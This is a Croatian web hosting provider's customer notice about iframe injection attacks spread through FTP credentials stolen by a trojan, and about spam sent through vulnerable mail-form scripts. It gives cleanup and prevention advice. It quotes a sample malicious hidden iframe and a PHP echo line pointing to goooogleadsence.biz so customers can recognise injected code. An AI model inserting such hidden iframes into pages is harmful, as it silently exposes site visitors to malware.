Nedavno je na našem serveru prvi puta primijećena aktivnost Iframe napada. U početku treba razjasniti kako dolazi do tih napada tj. od kuda stvar kreće.
Problem ili greška nije na serveru nego lokalno kod korisnika na računalu. Virusom se neprimjetno zarazi računalo korisnika što se desi pristupom nekoj od stranica koje su već bile zaražene, a Vi ili nemate nikakav antivirusni softver koji Vas od toga štiti ili Vaš antivirusni softver nije dovoljno dobar da detektira taj virus. Na korisnikovom računalu zatim naseli virus Trojan putem kojega se neovlašteno koriste pristupni podaci za pristup FTP-u. Na taj način automatski procesi sa udaljenih računala automatski na web hosting account u neke datoteke ubacuju iframe ili javascript kod. Većinom se radi o samo index.* datotekama, ali moguće je da bude ubačen i u neke druge datoteke. Pristupom toj sada "zaraženoj" stranici/datoteci i zbog samih propusta u Internet broserima, otvara se sadržaj neke druge stranice, a slijedom toga se na računalo posjetitelja može postaviti virus kojim će taj korisnik dalje proširiti "zarazu".

Kako spriječiti

Potrebno je učiniti nekoliko stvari da bi se mogućnost ponavljanja ovog problema svela na minimum:

OČISTITI I ZAŠTITITI RAČUNALO... treba obaviti temeljito čišćenje Vašeg računala anitivirus alatima. Ponekad nije dovoljno očistiti računalo jednim alatom, nego je potrebno dodatnim alatom obaviti čišćenje za svaku sigurnost. Osim jednokratnog čišćenja računala, potrebno je da Vaš antivirusni softver stalno nadgleda računalo što znači da ga morate imati instaliranoga i pokrenutog stalno. Na taj će način taj softver nadograđivati sam sebe sa novim definicijama virusa i timećete biti bolje zaštićeni od ovakvih problema.

PROMJENA PASSWORDA... treba promijeniti password za FTP pristup Vašem web hosting accountu. Password treba biti što složeniji. Nemojte koristiti jednostavne passworde. cPanel Vam daje mogućnost generiranja složenih passworda. Nemojte spremati password u FTP programu, nego ga ubacujte tamo po potrebi tj. kada trebate pristupiti Vašem web hosting accountu. Također savjetujemo da password mijenjate po mogućnosti i nekoliko puta mjesečno. Nemojte spremati passworde u Internet browserima jer raznorazni propusti u tim programima također mogu imati za posljedicu ukradeni password.

PREGLEDATI I UKLONITI PROBLEMATIČNI KOD...kao što je u početku objašnjeno, ukoliko ste već zaraženi, vjerojatno je već prenesen kod u prije spomenute datoteke na Vašem web hosting accountu. Potrebno je pregledati sve takve datoteke, a iframe kod ovakvog "virusnog" tipa možete pronaći u jednom od ovakvih oblika (primjer):

<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

ili

echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

NADOGRAĐIVATI SKRIPTE I LOKALNI PC SOFTVER OPĆENITO...potrebno je redovito nadograđivati Internet browser koji koristite, novim verzijama u kojima se krpaju propusti koji su otkriveni. Također je izuzetno važno da nadograđujete i skripte koje koristite na serveru, poput Joomla, Mambo, raznih skripti za Forume, WordPress i sl. Naime, upadi na Vaše web stranice moguće su i preko tih skripti. Proizvođači tih skripti stalno otkrivaju propuste i izdaju zakrpe/nadogradnje, a Vaša je obaveza da te zakrpe što prije primijenjujete čime smanjujete mogućnost pojave problema kakvi su ovdje navedeni.

Posljedice napada

Što se tiče Vaših web stranica tj. datoteka u koje je ugrađen problematičan kod, internet tražilice Vašu web stranicu mogu označiti upozorenjem da se na njoj nalazi virus kojim se posjetitelji mogu zaraziti. Zato je vrlo bitno da se problem što prije otkrije i da obavite postupke koji su Vam gore navedeni.

Molimo korisnike da shvate ove upute ozbiljno kako bi ove probleme sveli na minimum i ponavljamo da problem nije na serveru nego na korisnikovom računalu gdje treba obaviti potrebne radnje u svrhu sprečavanja ove pojave i zaštite općenito.

Mambo/Joomla sigurnosni propusti

U skriptama Mambo/Joomla postoji konstantni problem sa sigurnosnim propustima. Molimo sve korisnike koji imaju instaliranu ovu skriptu da uvijek nadograđuju na novu verziju u kojoj su propusti ispravljeni.

Sigurnost

Molimo vas za pozornost u svezi sigurnosti servera, a samim time i vaših web stranica.

U posljednje vrijeme zamjetili smo da su pojačane neovlaštene radnje od strane hakera tj. da koriste raznorazne propuste skripti koje koristite, a najčesće u svrhu slanja spam poruka sa udaljenih lokacija. Iako to nije nikakva novost, ipak zbog određenih situacija očito postoji potreba da korisnike informiramo o sigurnosti na internetu i kakvu prevenciju treba provoditi da bi eventualne probleme tog tipa sveli na najmanju moguću mjeru.
Primjerice, ukoliko haker pronađe sigurnosni propust u nekoj skripti, može koristiti vašu domenu za neovlašteno slanje spam poruka. Kada se takvo nešto desi tj. kada se vaša skripta iskoristi za takve neovlaštene radnje, stiže opomena iz datacentra sa zahtjevom da se spomenuti account odmah suspendira ili ukine. Ne govorimo ovdje o nekoliko e-mail poruka takve vrste, nego o sotinama ili tisućama e-mailova koji bivaju slani na raznorazne adrese sa vaše skripte i to samo u nekoliko sati. Napominjemo da svaki korisnik odgovara za svoj web prostor i za datoteke koje se na njemu koriste pa tako odgovara i u slučaju bilo kakvih neovlaštenih radnji koje se odvijaju sa njegovo prostora. Mi jedino možemo reagirati na to nakon što dobijemo prijavu da se takve radnje izvode. Prema tome, moramo vas upozoriti da kada odaberete neku skriptu, prije se informirajte kakav nivo zaštite skripta nudi te ih svakako downloadajte samo sa provjerenih internet lokacija.

Kako smo več napomenuli, skripte koje su najčešće predmet iskorištavanja od strane neovlaštenih osoba su najčešće u prvom redu raznorazne form skripte (mail obrasci) koje imate postavljenje na svojim stranicama kako bi vas posjetitelji kontaktirali. Ustvari oko ovog problema vrše se raznorazne rasprave u vezi iskorištavanja form skripti za neovlašteno slanje e-maila. Savjet, ali i naša molba je da takvu vrstu načina kontakta u potpunosti uklonite sa svojih stranica i jednostavno postavite e-mail adresu na koju vas posjetitelj web stranica može direktno kontaktirati preko svog mail klijent softvera. Ukoliko je izuzetno neophodno da morate koristiti takav način kontakta (znaci, preko mail forme- obrasca), molimo vas da koristite isključivo provjerene skripte koje pisci tih skripti redovito osvježavaju novim verzijama sa boljim sigurnosnim zastitama. Iz tog razloga pozivamo sve korisnike da što prije nadograde sve skripte koje koristite, a posebno znači, one koje imaju bilo kakvu funkciju slanja e-maila.

Osim toga molimo korisnike da redovito prate izdavanje novih verzija ostalih skripti poput:

- foruma
- galerija
- cms
- guestbook

te da ih naravno što prije nadogradite na najnoviju verziju jer samo tako možete smanjiti mogućnost neovlaštenih upada na svoje web stranice.
Internet je takvo okruženje koje će uvijek biti sredstvo raznoraznih hakera da iskorištavaju propuste proizvođača softvera, a samo odgovornošću samih korisnika može umanjiti nered koji hakeri mogu stvoriti.

Zato još jednom na kraju, pozivamo vas da :
- provjerite svoje web prostore od možebitnih sumnjivih skripti te da ih odmah uklonite
- provjerite verzije skripti (foruma, kontakt obrazaca,.....) koje koristite te da ih što prije nadogradite najnovijim verzijama
- uklonite skripte tipa kontakt obrazaca, ako nisu izuzetno neophodne i pozivamo vas da koristite alternativne načine e-mail kontakta sa vaših web stranica

Za detalje o pojedinim skriptama-softveru kojeg koristite, potražite dodatna objašnjenja na web stranicama za podršku dotičnih skripti.

-MEDIALINK-